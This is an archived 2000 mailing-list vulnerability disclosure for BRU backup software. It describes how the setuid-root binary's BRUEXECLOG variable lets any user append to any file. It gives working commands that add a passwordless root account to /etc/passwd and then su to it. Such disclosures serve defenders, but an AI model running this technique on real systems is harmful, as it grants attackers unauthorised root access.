OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: BRU Vulnerability
From: root (comsec.adminGTE.NET)
Date: Tue Jun 06 2000 - 16:22:24 CDT


We have found a vulnerability in BRU during our 'Security Contest' for
our company.

The details are included.

--

Riley Hassell Network Security Speakeasy Networks

1-206-728-9770 ext151

1-206-917-5151 Direct Line

BRU backup software Vulnerability:

Description: You can change the log file BRU uses by changing the BRUEXECLOG environment variable. Since bru is setuid root you can append to any file on the system.

Exploitation:

$ BRUEXECLOG=/etc/passwd $ export BRUEXECLOG $ bru -V ' > comsec::0:0::/:/bin/sh > ' $ su comsec #

Temporary fix: Why do normal users need to run bru. ;)